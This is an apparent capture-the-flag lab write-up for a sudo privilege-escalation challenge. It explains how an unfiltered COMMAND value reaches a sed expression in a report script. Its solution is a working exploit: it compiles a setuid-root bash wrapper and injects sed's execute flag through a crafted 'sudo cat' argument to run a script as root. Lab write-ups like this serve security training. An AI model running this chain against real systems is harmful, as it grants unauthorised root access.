Challenge 17: Replay It Again Sam

Level: Hard Sudo Rule: localuser17 ALL=(ALL) NOPASSWD: /bin/ls /reports/, /bin/cat, /usr/local/bin/sudo_report.sh

Notes: This script is vulnerable to a sed statement injection because of the following lines:

    	/usr/bin/sudoreplay -R -s 999 $2 | \
   		 /bin/sed -e 's,\x1B\[[0-9;]*[a-zA-Z],,g' \
   		 -e "s:Replaying sudo session\: ${COMMAND}::" > $TEMP

The COMMAND is unfiltered and captured here by parsing this out of the replay file:

    	COMMAND=$(/usr/bin/sudoreplay -l |\
   	 /bin/grep TSID=${2} |\
   	 /usr/bin/awk -F= '{print $6}')

Because we control what COMMAND matches, we can insert any sed replacement commands, including ones that use the execute feature.

Solution:

sudo -l
cat /usr/local/bin/sudo_report.sh

cat > /tmp/root.c << EOF
#include <stdlib.h>
main() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
EOF

gcc -o /tmp/root /tmp/root.c

cat > /tmp/script.sh << EOF
#!/bin/sh
chown root /tmp/root
chmod 6755 /tmp/root
EOF

chmod +x /tmp/script.sh
sudo cat "::; s:.:/tmp/script.sh :e; s:asdf"
sudo /usr/local/bin/sudo_report.sh list
sudo /usr/local/bin/sudo_report.sh report TSID
/tmp/root
id